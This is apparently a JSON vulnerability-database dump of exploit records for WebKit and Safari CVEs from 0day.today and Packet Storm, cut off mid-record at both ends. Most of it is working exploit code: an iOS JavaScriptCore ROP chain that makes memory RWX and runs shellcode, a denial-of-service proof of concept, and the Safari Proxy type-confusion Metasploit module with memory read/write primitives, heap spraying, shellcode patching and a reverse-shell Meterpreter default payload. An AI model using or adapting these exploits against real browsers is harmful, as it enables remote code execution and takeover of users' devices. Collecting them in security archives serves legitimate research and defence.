= 0xdead0016; // x26 (unused)\r\n arr[pos++] = 0xdead0017; // x26 (unused)\r\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\r\n arr[pos++] = x3.hi(); 
// x25 == x3 (arg4)\r\n arr[pos++] = x0.lo(); // x24 == x0 (arg1)\r\n arr[pos++] = x0.hi(); // x24 == x0 (arg1)\r\n arr[pos++] = x2.lo(); // x23 == x2 (arg3)\r\n arr[pos++] = x2.hi(); // x23 == x2 (arg3)\r\n arr[pos++] = x3.lo(); // x22 == x3 (arg4)\r\n arr[pos++] = x3.hi(); // x22 == x3 (arg4)\r\n arr[pos++] = func.lo(); // x21 (target for dispatch)\r\n arr[pos++] = func.hi(); // x21 (target for dispatch)\r\n arr[pos++] = 0xdead0018; // x20 (unused)\r\n arr[pos++] = 0xdead0019; // x20 (unused)\r\n var tmppos = pos;\r\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\r\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\r\n arr[pos++] = 0xdead001c; // x29 (unused)\r\n arr[pos++] = 0xdead001d; // x29 (unused)\r\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\r\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\r\n\r\n // in ldrx8\r\n if (x4) {\r\n arr[pos++] = stackloader.lo();\r\n arr[pos++] = stackloader.hi();\r\n } else {\r\n arr[pos++] = dispatch.lo(); // x8 (target for regloader)\r\n arr[pos++] = dispatch.hi(); // x8 (target for regloader)\r\n }\r\n arr[pos++] = 0xdead1401; // (unused)\r\n arr[pos++] = 0xdead1402; // (unused)\r\n arr[pos++] = 0xdead1301; // x20 (unused)\r\n arr[pos++] = 0xdead1302; // x20 (unused)\r\n arr[pos++] = x1.lo(); // x19 == x1 (arg2)\r\n arr[pos++] = x1.hi(); // x19 == x1 (arg2)\r\n arr[pos++] = 0xdead1201; // x29 (unused)\r\n arr[pos++] = 0xdead1202; // x29 (unused)\r\n arr[pos++] = regloader.lo(); // x30 (next gadget)\r\n arr[pos++] = regloader.hi(); // x30 (next gadget)\r\n\r\n // in regloader\r\n // NOTE: REGLOADER DOES NOT ADJUST SP!\r\n // sometimes i didn't get expected value in x4\r\n // and i have no fucking idea why\r\n // usleep likely did the trick, but I would still keep the code\r\n // with movx4\r\n //arr[pos++] = x4.lo() // x4 (should be -- but see lines above)\r\n //arr[pos++] = x4.hi() // x4 (should be -- but see lines above)\r\n\r\n if (x4) {\r\n // in 
stackloader:\r\n arr[pos++] = 0xdaad0010; // unused\r\n arr[pos++] = 0xdaad0011; // unused\r\n arr[pos++] = 0xdaad0012; // unused\r\n arr[pos++] = 0xdaad0013; // unused\r\n arr[pos++] = 0xdaad1101; // x28 (unused)\r\n arr[pos++] = 0xdaad1102; // x28 (unused)\r\n arr[pos++] = 0xdaad0014; // x27 == x6 (unused)\r\n arr[pos++] = 0xdaad0015; // x27 == x6 (unused)\r\n arr[pos++] = 0xdaad0016; // x26 (unused)\r\n arr[pos++] = 0xdaad0017; // x26 (unused)\r\n arr[pos++] = 0xdaad0018; // x25 (unused)\r\n arr[pos++] = 0xdaad0019; // x25 (unused)\r\n arr[pos++] = 0xdaad00f0; // x24 (unused)\r\n arr[pos++] = 0xdaad00f1; // x24 (unused)\r\n arr[pos++] = 0xdaad00f2; // x23 (unused)\r\n arr[pos++] = 0xdaad00f3; // x23 (unused)\r\n arr[pos++] = 0xdaad00f4; // x22 (unused)\r\n arr[pos++] = 0xdaad00f5; // x22 (unused)\r\n arr[pos++] = func.lo(); // x21 (target for dispatch)\r\n arr[pos++] = func.hi(); // x21 (target for dispatch)\r\n arr[pos++] = 0xdaad0018; // x20 (unused)\r\n arr[pos++] = 0xdaad0019; // x20 (unused)\r\n tmppos = pos;\r\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\r\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\r\n arr[pos++] = 0xdaad001c; // x29 (unused)\r\n arr[pos++] = 0xdaad001d; // x29 (unused)\r\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\r\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\r\n\r\n // in ldrx8\r\n arr[pos++] = dispatch.lo(); // x8 (target for movx4)\r\n arr[pos++] = dispatch.hi(); // x8 (target for movx4)\r\n arr[pos++] = 0xdaad1401; // (unused)\r\n arr[pos++] = 0xdaad1402; // (unused)\r\n arr[pos++] = x4.lo(); // x20 == x4 (arg5)\r\n arr[pos++] = x4.hi(); // x20 == x4 (arg5)\r\n arr[pos++] = 0xdaad1301; // x19 (unused)\r\n arr[pos++] = 0xdaad1302; // x19 (unused)\r\n arr[pos++] = 0xdaad1201; // x29 (unused)\r\n arr[pos++] = 0xdaad1202; // x29 (unused)\r\n arr[pos++] = movx4.lo(); // x30 (next gadget)\r\n arr[pos++] = movx4.hi(); // x30 (next gadget)\r\n }\r\n\r\n 
// after dispatch:\r\n\r\n // keep only one: these or 0xdeaded01\r\n arr[pos++] = 0xdead0022; // unused\r\n arr[pos++] = 0xdead0023; // unused\r\n\r\n arr[pos++] = 0xdead0022; // unused\r\n arr[pos++] = 0xdead0023; // unused\r\n arr[pos++] = 0xdead0024; // x22 (unused)\r\n arr[pos++] = 0xdead0025; // x22 (unused)\r\n arr[pos++] = 0xdead0026; // x21 (unused)\r\n arr[pos++] = 0xdead0027; // x21 (unused)\r\n arr[pos++] = 0xdead0028; // x20 (unused)\r\n arr[pos++] = 0xdead0029; // x20 (unused)\r\n arr[pos++] = 0xdead002a; // x19 (unused)\r\n arr[pos++] = 0xdead002b; // x19 (unused)\r\n arr[pos++] = 0xdead002c; // x29 (unused)\r\n arr[pos++] = 0xdead002d; // x29 (unused)\r\n arr[pos++] = jump_to.lo(); // x30 (gadget)\r\n arr[pos++] = jump_to.hi(); // x30 (gadget)\r\n }\r\n\r\n var add_call = function(func, x0, x1, x2, x3, x4, jump_to) {\r\n x0 = x0 || Int64.Zero\r\n x1 = x1 || Int64.Zero\r\n x2 = x2 || Int64.Zero\r\n x3 = x3 || Int64.Zero\r\n jump_to = jump_to || stackloader\r\n\r\n return (ldrx8 ? add_call_via_x8 : add_call_llvm)(\r\n func, x0, x1, x2, x3, x4, jump_to\r\n )\r\n }\r\n\r\n #{ios_11 ? 
'\r\n if (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) {\r\n add_call(jitWriteSeparateHeaps\r\n , Sub(codeAddr, memPoolStart) // off\r\n , paddr // src\r\n , shsz // size\r\n );\r\n } else {\r\n fail(\"jitWrite\");\r\n }\r\n ' : '\r\n add_call(mach_vm_protect,\r\n mach_task_self_, // task\r\n codeAddr, // addr\r\n shsz, // size\r\n new Int64(0), // set maximum\r\n new Int64(7) // prot (RWX)\r\n );\r\n\r\n add_call(memmove,\r\n codeAddr, // dst\r\n paddr, // src\r\n shsz // size\r\n );\r\n '}\r\n\r\n add_call(codeAddr,\r\n dlopen,\r\n dlsym,\r\n jitWriteSeparateHeaps,\r\n memPoolStart,\r\n memPoolEnd,\r\n );\r\n\r\n for(var i = 0; i < 0x20; ++i)\r\n {\r\n arr[pos++] = 0xde00c0de + (i<<16);\r\n }\r\n\r\n var sp = Add(stack, (arrsz - off) * 4);\r\n memory.writeInt64(Add(el_addr, 0x60), Add(sp, 0x60)); // x29\r\n memory.writeInt64(Add(el_addr, 0x68), sp); // x2 (copied into sp)\r\n\r\n // trigger\r\n //print(\"u rdy?\")\r\n wrapper.addEventListener(\"click\", function(){});\r\n\r\n}\r\n\r\n#{get_mem_rw}\r\n\r\nfunction go() {\r\n try {\r\n var req = new XMLHttpRequest;\r\n req.open(\"GET\", \"exploit\");\r\n req.responseType = \"arraybuffer\";\r\n req.addEventListener(\"load\", function() {\r\n try {\r\n if (req.responseType != \"arraybuffer\") throw \"y u no blob\";\r\n payload.set(new Uint8Array(req.response), 0x0);\r\n pwn();\r\n } catch (e) {\r\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\r\n }\r\n });\r\n req.addEventListener(\"error\", function(ev) {\r\n fail(ev)\r\n });\r\n req.send()\r\n } catch (e) {\r\n fail(\"Error: \" + e + (e != null ? 
\" \" + e.stack : \"\"))\r\n }\r\n};\r\n\r\ngo();\r\n\r\n</script>\r\n</body>\r\n</html>\r\n ^\r\n unless datastore['DEBUG_EXPLOIT']\r\n html.gsub!(/\\/\\/.*$/, '') # strip comments\r\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\r\n end\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\r\n end\r\n\r\nend\n\n# 0day.today [2019-06-03] #", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/32828"}], "packetstorm": [{"lastseen": "2018-06-13T06:21:03", "description": "", "published": "2018-06-11T00:00:00", "type": "packetstorm", "title": "WebKitGTK+ WebKitFaviconDatabase Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-11T00:00:00", "id": "PACKETSTORM:148135", "href": "https://packetstormsecurity.com/files/148135/WebKitGTK-WebKitFaviconDatabase-Denial-Of-Service.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => \"WebKitGTK+ WebKitFaviconDatabase DoS\", \n'Description' => %q( \nThis module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. \nIf successful, it could lead to application crash, resulting in denial of service. 
\n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Dhiraj Mishra', # Original discovery, disclosure \n'Hardik Mehta', # Original discovery, disclosure \n'Zubin Devnani', # Original discovery, disclosure \n'Manuel Caballero' #JS Code \n], \n'References' => [ \n['EDB', '44842'], \n['CVE', '2018-11646'], \n['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'], \n['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html'] \n], \n'DisclosureDate' => 'Jun 03 2018', \n'Actions' => [[ 'WebServer' ]], \n'PassiveActions' => [ 'WebServer' ], \n'DefaultAction' => 'WebServer' \n) \n) \nend \n \ndef run \nexploit # start http server \nend \n \ndef setup \n@html = <<-JS \n<script type=\"text/javascript\"> \nwin = window.open(\"WIN\", \"WIN\"); \nwindow.open(\"http://example.com/\", \"WIN\"); \nwin.document.execCommand('stop'); \nwin.document.write(\"HelloWorld\"); \nwin.document.close(); \n</script> \nJS \nend \n \ndef on_request_uri(cli, _request) \nprint_status('Sending response') \nsend_response(cli, @html) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148135/webkitplus.rb.txt"}, {"lastseen": "2018-06-06T09:30:47", "description": "", "published": "2018-06-05T00:00:00", "type": "packetstorm", "title": "WebKitGTK+ 2.21.3 pageURL Mishandling Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-05T00:00:00", "id": "PACKETSTORM:148053", "href": "https://packetstormsecurity.com/files/148053/WebKitGTK-2.21.3-pageURL-Mishandling-Denial-Of-Service.html", "sourceData": "`Summary: \n \nwebkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue. 
\n \nPoC Author: @magicmac2000 \nFound Issue in Webkit: Dhiraj Mishra (Team w00t) \n \nPoC: \n \n<script> \nwin = window.open(\"sleep_one_second.php\", \"WIN\"); \nwindow.open(\"https://www.paypal.com\", \"WIN\"); \nwin.document.execCommand('Stop'); \nwin.document.write(\"Spoofed URL\"); \nwin.document.close(); \n</script> \n \n \nBacktrace using fedora 27: \n \n#0 WTF::StringImpl::rawHash \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508 \n#1 WTF::StringImpl::hasHash \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514 \n#2 WTF::StringImpl::hash \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525 \n#3 WTF::StringHash::hash \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73 \n#9 WTF::HashMap, WTF::HashTraits >::get \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406 \n#10 webkitFaviconDatabaseSetIconURLForPageURL \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193 \n#11 webkitFaviconDatabaseSetIconForPageURL \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318 \n#12 webkitWebViewSetIcon \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964 \n#13 WTF::Function::performCallbackWithReturnValue \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108 \n#15 WebKit::WebPageProxy::dataCallback \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083 \n#16 WebKit::WebPageProxy::finishedLoadingIcon \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848 \n#17 IPC::callMemberFunctionImpl::operator() \nat 
/usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68 \n#29 WTF::RunLoop::::_FUN(gpointer) \nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70 \n#30 g_main_dispatch \nat gmain.c line 3148 \n#31 g_main_context_dispatch \nat gmain.c line 3813 \n#32 g_main_context_iterate \nat gmain.c line 3886 \n#33 g_main_context_iteration \nat gmain.c line 3947 \n#34 g_application_run \nat gapplication.c line 2401 \n#35 main \nat ../src/ephy-main.c line 432 \n \n \nReference's: \n \nhttps://bugs.webkit.org/show_bug.cgi?id=186164 \nhttps://bugzilla.gnome.org/show_bug.cgi?id=795740 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148053/CVE-2018-11646.txt"}, {"lastseen": "2018-12-25T18:50:54", "description": "", "published": "2018-12-13T00:00:00", "type": "packetstorm", "title": "Safari Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4404", "CVE-2018-4233"], "modified": "2018-12-13T00:00:00", "id": "PACKETSTORM:150779", "href": "https://packetstormsecurity.com/files/150779/Safari-Proxy-Object-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Safari Proxy Object Type Confusion', \n'Description' => %q{ \nThis module exploits a type confusion bug in the Javascript Proxy object in \nWebKit. The DFG JIT does not take into account that, through the use of a Proxy, \nit is possible to run arbitrary JS code during the execution of a CreateThis \noperation. This makes it possible to change the structure of e.g. 
an argument \nwithout causing a bailout, leading to a type confusion (CVE-2018-4233). \n \nThe JIT region is then replaced with shellcode which loads the second stage. \nThe second stage exploits a logic error in libxpc, which uses command execution \nvia the launchd's \"spawn_via_launchd\" API (CVE-2018-4404). \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'saelo' ], \n'References' => [ \n['CVE', '2018-4233'], \n['CVE', '2018-4404'], \n['URL', 'https://github.com/saelo/cve-2018-4233'], \n['URL', 'https://github.com/saelo/pwn2own2018'], \n['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'], \n], \n'Arch' => [ ARCH_PYTHON, ARCH_CMD ], \n'Platform' => 'osx', \n'DefaultTarget' => 0, \n'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }, \n'Targets' => [ \n[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ], \n[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ], \n], \n'DisclosureDate' => 'Mar 15 2018')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]), \n]) \nend \n \ndef offset_table \n{ \n'10.12.6' => { \n:jsc_vtab => '0x0000d8d8', \n:dyld_stub_loader => '0x00001168', \n:dlopen => '0x000027f7', \n:confstr => '0x00002c84', \n:strlen => '0x00001b40', \n:strlen_got => '0xdc0', \n}, \n'10.13' => { \n:jsc_vtab => '0x0000e5f8', \n:dyld_stub_loader => '0x000012a8', \n:dlopen => '0x00002e60', \n:confstr => '0x000024fc', \n:strlen => '0x00001440', \n:strlen_got => '0xee8', \n}, \n'10.13.3' => { \n:jsc_vtab => '0xe5e8', \n:dyld_stub_loader => '0x1278', \n:dlopen => '0x2e30', \n:confstr => '0x24dc', \n:strlen => '0x1420', \n:strlen_got => '0xee0', \n}, \n} \nend \n \ndef exploit_data(directory, file) \npath = ::File.join Msf::Config.data_directory, 'exploits', directory, file \n::File.binread path \nend \n \ndef stage1_js \nstage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\" 
\n\"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\" \nend \n \ndef stage2_js \nstage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\" \npayload_cmd = payload.raw \nif target['Arch'] == ARCH_PYTHON \npayload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\" \nend \nplaceholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER') \nstage2[placeholder_index, payload_cmd.length] = payload_cmd \n\"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\" \nend \n \ndef get_offsets(user_agent) \nif user_agent =~ /Intel Mac OS X (.*?)\\)/ \nversion = $1.gsub(\"_\", \".\") \nmac_osx_version = Gem::Version.new(version) \nif mac_osx_version >= Gem::Version.new('10.13.4') \nprint_warning \"macOS version #{mac_osx_version} is not vulnerable\" \nelsif mac_osx_version < Gem::Version.new('10.12') \nprint_warning \"macOS version #{mac_osx_version} is not vulnerable\" \nelsif offset_table.key?(version) \noffset = offset_table[version] \nreturn <<-EOF \nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]}; \nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]}; \nconst DLOPEN_OFFSET = #{offset[:dlopen]}; \nconst CONFSTR_OFFSET = #{offset[:confstr]}; \nconst STRLEN_OFFSET = #{offset[:strlen]}; \nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]}; \nEOF \nelse \nprint_warning \"No offsets for version #{mac_osx_version}\" \nend \nelse \nprint_warning \"Unexpected User-Agent\" \nend \nreturn false \nend \n \ndef on_request_uri(cli, request) \nuser_agent = request['User-Agent'] \nprint_status(\"Request from #{user_agent}\") \noffsets = get_offsets(user_agent) \nunless offsets \nsend_not_found(cli) \nreturn \nend \n \nutils = exploit_data \"CVE-2018-4233\", \"utils.js\" \nint64 = exploit_data \"CVE-2018-4233\", \"int64.js\" \nhtml = %Q^ \n<html> \n<body> \n<script> \n#{stage1_js} \nstage1.replace = function(oldVal, newVal) { \nfor (var idx = 0; idx < this.length; idx++) { \nvar found = true; \nfor (var j = idx; j < idx + 8; j++) { \nif (this[j] != oldVal.byteAt(j - idx)) { 
\nfound = false; \nbreak; \n} \n} \nif (found) \nbreak; \n} \nthis.set(newVal.bytes(), idx); \n}; \n#{stage2_js} \n#{utils} \n#{int64} \n#{offsets} \n \nvar ready = new Promise(function(resolve) { \nif (typeof(window) === 'undefined') \nresolve(); \nelse \nwindow.onload = function() { \nresolve(); \n} \n}); \n \nready = Promise.all([ready]); \n \nprint = function(msg) { \n//console.log(msg); \n//document.body.innerText += msg + '\\\\n'; \n} \n \n// Must create this indexing type transition first, \n// otherwise the JIT will deoptimize later. \nvar a = [13.37, 13.37]; \na[0] = {}; \n \nvar referenceFloat64Array = new Float64Array(0x1000); \n \n// \n// Bug: the DFG JIT does not take into account that, through the use of a \n// Proxy, it is possible to run arbitrary JS code during the execution of a \n// CreateThis operation. This makes it possible to change the structure of e.g. \n// an argument without causing a bailout, leading to a type confusion. \n// \n \n// \n// addrof primitive \n// \nfunction setupAddrof() { \nfunction InfoLeaker(a) { \nthis.address = a[0]; \n} \n \nvar trigger = false; \nvar leakme = null; \nvar arg = null; \n \nvar handler = { \nget(target, propname) { \nif (trigger) \narg[0] = leakme; \nreturn target[propname]; \n}, \n}; \nvar InfoLeakerProxy = new Proxy(InfoLeaker, handler); \n \nfor (var i = 0; i < 100000; i++) { \nnew InfoLeakerProxy([1.1, 2.2, 3.3]); \n} \n \ntrigger = true; \n \nreturn function(obj) { \nleakme = obj; \narg = [1.1, 1.1]; \nvar o = new InfoLeakerProxy(arg); \nreturn o.address; \n}; \n} \n \n// \n// fakeobj primitive \n// \nfunction setupFakeobj() { \nfunction ObjFaker(a, address) { \na[0] = address; \n} \n \nvar trigger = false; \nvar arg = null; \n \nvar handler = { \nget(target, propname) { \nif (trigger) \narg[0] = {}; \nreturn target[propname]; \n}, \n}; \nvar ObjFakerProxy = new Proxy(ObjFaker, handler); \n \nfor (var i = 0; i < 100000; i++) { \nnew ObjFakerProxy([1.1, 2.2, 3.3], 13.37); \n} \n \ntrigger = true; \n 
\nreturn function(address) { \narg = [1.1, 1.1]; \nvar o = new ObjFakerProxy(arg, address); \nreturn arg[0]; \n}; \n} \n \nfunction makeJITCompiledFunction() { \n// Some code to avoid inlining... \nfunction target(num) { \nfor (var i = 2; i < num; i++) { \nif (num % i === 0) { \nreturn false; \n} \n} \nreturn true; \n} \n \n// Force JIT compilation. \nfor (var i = 0; i < 1000; i++) { \ntarget(i); \n} \nfor (var i = 0; i < 1000; i++) { \ntarget(i); \n} \nfor (var i = 0; i < 1000; i++) { \ntarget(i); \n} \nreturn target; \n} \n \nfunction pwn() { \n// Spray Float64Array structures so that structure ID 0x1000 will \n// be a Float64Array with very high probability \nvar structs = []; \nfor (var i = 0; i < 0x1000; i++) { \nvar a = new Float64Array(1); \na['prop' + i] = 1337; \nstructs.push(a); \n} \n \n// Setup exploit primitives \nvar addrofOnce = setupAddrof(); \nvar fakeobjOnce = setupFakeobj(); \n \n// (Optional) Spray stuff to keep the background GC busy and increase reliability even further \n/* \nvar stuff = []; \nfor (var i = 0; i < 0x100000; i++) { \nstuff.push({foo: i}); \n} \n*/ \n \nvar float64MemView = new Float64Array(0x200); \nvar uint8MemView = new Uint8Array(0x1000); \n \n// Setup container to host the fake Float64Array \nvar jsCellHeader = new Int64([ \n00, 0x10, 00, 00, // m_structureID \n0x0, // m_indexingType \n0x2b, // m_type \n0x08, // m_flags \n0x1 // m_cellState \n]); \n \nvar container = { \njsCellHeader: jsCellHeader.asJSValue(), \nbutterfly: null, \nvector: float64MemView, \nlength: (new Int64('0x0001000000001337')).asJSValue(), \nmode: {}, // an empty object, we'll need that later \n}; \n \n// Leak address and inject fake object \n// RawAddr == address in float64 form \nvar containerRawAddr = addrofOnce(container); \nvar fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16); \nprint(\"[+] Fake Float64Array @ \" + fakeArrayAddr); \n \n/// \n/// BEGIN CRITICAL SECTION \n/// \n/// Objects are corrupted, a GC would now crash the process. 
\n/// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations. \n/// \nvar driver = fakeobjOnce(fakeArrayAddr.asDouble()); \nwhile (!(driver instanceof Float64Array)) { \njsCellHeader.assignAdd(jsCellHeader, Int64.One); \ncontainer.jsCellHeader = jsCellHeader.asJSValue(); \n} \n \n// Get some addresses that we'll need to repair our objects. We'll abuse the .mode \n// property of the container to leak addresses. \ndriver[2] = containerRawAddr; \nvar emptyObjectRawAddr = float64MemView[6]; \ncontainer.mode = referenceFloat64Array; \nvar referenceFloat64ArrayRawAddr = float64MemView[6]; \n \n// Fixup the JSCell header of the container to make it look like an empty object. \n// By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array. \ndriver[2] = emptyObjectRawAddr; \nvar header = float64MemView[0]; \ndriver[2] = containerRawAddr; \nfloat64MemView[0] = header; \n \n// Copy the JSCell header from an existing Float64Array and set the butterfly to zero. \n// Also set the mode: make it look like an OversizeTypedArray for easy GC survival \n// (see JSGenericTypedArrayView<Adaptor>::visitChildren). \ndriver[2] = referenceFloat64ArrayRawAddr; \nvar header = float64MemView[0]; \nvar length = float64MemView[3]; \nvar mode = float64MemView[4]; \ndriver[2] = containerRawAddr; \nfloat64MemView[2] = header; \nfloat64MemView[3] = 0; \nfloat64MemView[5] = length; \nfloat64MemView[6] = mode; \n \n// Root the container object so it isn't garbage collected. \n// This will allocate a butterfly for the fake object and store a reference to the container there. \n// The fake array itself is rooted by the memory object (closures). 
\ndriver.container = container; \n \n/// \n/// END CRITICAL SECTION \n/// \n/// Objects are repaired, we will now survive a GC \n/// \nif (typeof(gc) !== 'undefined') \ngc(); \n \nmemory = { \nread: function(addr, length) { \ndriver[2] = memory.addrof(uint8MemView).asDouble(); \nfloat64MemView[2] = addr.asDouble(); \nvar a = new Array(length); \nfor (var i = 0; i < length; i++) \na[i] = uint8MemView[i]; \nreturn a; \n}, \n \nwrite: function(addr, data) { \ndriver[2] = memory.addrof(uint8MemView).asDouble(); \nfloat64MemView[2] = addr.asDouble(); \nfor (var i = 0; i < data.length; i++) \nuint8MemView[i] = data[i]; \n}, \n \nread8: function(addr) { \ndriver[2] = addr.asDouble(); \nreturn Int64.fromDouble(float64MemView[0]); \n}, \n \nwrite8: function(addr, value) { \ndriver[2] = addr.asDouble(); \nfloat64MemView[0] = value.asDouble(); \n}, \n \naddrof: function(obj) { \nfloat64MemView.leakme = obj; \nvar butterfly = Int64.fromDouble(driver[1]); \nreturn memory.read8(Sub(butterfly, 0x10)); \n}, \n}; \n \nprint(\"[+] Got stable memory read/write!\"); \n \n// Find binary base \nvar funcAddr = memory.addrof(Math.sin); \nvar executableAddr = memory.read8(Add(funcAddr, 24)); \nvar codeAddr = memory.read8(Add(executableAddr, 24)); \nvar vtabAddr = memory.read8(codeAddr); \nvar jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET); \nprint(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned); \nvar jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\")); \nprint(\"[*] JavaScriptCore.dylib @ \" + jscBase); \n \nvar dyldStubLoaderAddr = memory.read8(jscBase); \nvar dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET); \nvar strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET)); \nvar libCBase = Sub(strlenAddr, STRLEN_OFFSET); \nprint(\"[*] dyld.dylib @ \" + dyldBase); \nprint(\"[*] libsystem_c.dylib @ \" + libCBase); \n \nvar confstrAddr = Add(libCBase, CONFSTR_OFFSET); \nprint(\"[*] confstr @ \" + confstrAddr); \nvar dlopenAddr = Add(dyldBase, DLOPEN_OFFSET); 
\nprint(\"[*] dlopen @ \" + dlopenAddr); \n \n// Patching shellcode \nvar stage2Addr = memory.addrof(stage2); \nstage2Addr = memory.read8(Add(stage2Addr, 16)); \nprint(\"[*] Stage 2 payload @ \" + stage2Addr); \n \nstage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr); \nstage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr); \nstage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length)); \nstage1.replace(new Int64(\"0x4444444444444444\"), dlopenAddr); \nprint(\"[+] Shellcode patched\"); \n \n// Leak JITCode pointer poison value \nvar poison_addr = Add(jscBase, 305152); \nprint(\"[*] Poison value @ \" + poison_addr); \nvar poison = memory.read8(poison_addr); \nprint(\"[*] Poison value: \" + poison); \n \n// Shellcode \nvar func = makeJITCompiledFunction(); \nvar funcAddr = memory.addrof(func); \nprint(\"[+] Shellcode function object @ \" + funcAddr); \nvar executableAddr = memory.read8(Add(funcAddr, 24)); \nprint(\"[+] Executable instance @ \" + executableAddr); \nvar jitCodeAddr = memory.read8(Add(executableAddr, 24)); \nprint(\"[+] JITCode instance @ \" + jitCodeAddr); \n \nvar codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32)); \nvar codeAddr = Xor(codeAddrPoisoned, poison); \nprint(\"[+] RWX memory @ \" + codeAddr.toString()); \nprint(\"[+] Writing shellcode...\"); \nvar origCode = memory.read(codeAddr, stage1.length); \nmemory.write(codeAddr, stage1); \n \nprint(\"[!] 
